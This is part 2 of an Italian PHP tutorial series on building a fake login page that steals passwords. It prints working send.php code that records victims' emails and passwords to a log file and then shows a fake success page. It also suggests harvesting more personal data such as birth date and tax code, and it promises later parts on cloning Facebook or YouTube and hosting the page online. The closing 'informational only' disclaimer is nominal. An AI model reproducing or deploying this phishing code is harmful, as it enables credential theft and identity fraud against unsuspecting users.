PHP: Rubare Password Con I Fake Login - Parte 2

Analizziamo nel dettaglio la pagina send.php ovvero la pagina che ricava le credenziali che l'utente ha inserito in quello che credeva il login quando in realtà era una semplice form "ruba-dati". Nel nostro caso la form chiedeva solo email e password ma possiamo aggiungere molti altri campi come la data di nascita, comune di nascita o codice fiscale. Molto gente cadrà nel "tranello". In questa parte della guida, vedremo anche il funzionamento delle pagine log.txt e ok.php.

Send.php

<?php
$email = $_POST['email'];
$password = $_POST['password'];
$f = fopen("log.txt", "a");
$rigaDaInserire = "Username: {$email}   Password: {$password}\n";
fwrite($f, $rigaDaInserire);
fclose($f);
header("Refresh: 0; URL = ok.php");
?>

In pratica, send.php ricava le informazioni dal post della pagina login.php e le memorizza nel file log.txt, dopo aver fatto ciò reindirizza l'utente alla pagina di conferma/fallito login ovvero ok.php.

Ok.php

<h1>Login effettuato con successo!</h1>

Ovviamente in questa guida mi sono ridotto al minimo indispensabile, vi consiglio di arricchire le pagine con immagini e "compagnia bella". Nella terza parte, ovvero la prossima, vedremo anche come realizzare un fake login con la grafica di Facebook o altri siti come Youtube ecc... in modo da aumentare la credibilità del login.

Il file log.txt sarà vuoto oppure può anche non essere creato. Esso, infatti, sarà riempito man mano che verranno effettuati "login" (se così possiamo chiamarli) con le varie email e password inserite, se non esiste verrà creato in automatico.

Nella quarta parte della guida, ovvero la successiva alla prossima, vedremo come mettere su internet un fake login (se non sapete già farlo); non vorrei essere ripetitivo ma è d'obbligo dire che questi articoli sono a solo scopo informativo.

Se avete apprezzato questa guida e volete che continui a scriverla con lo stesso impegno non esitate a commentare.

< Prima Parte | Terza Parte >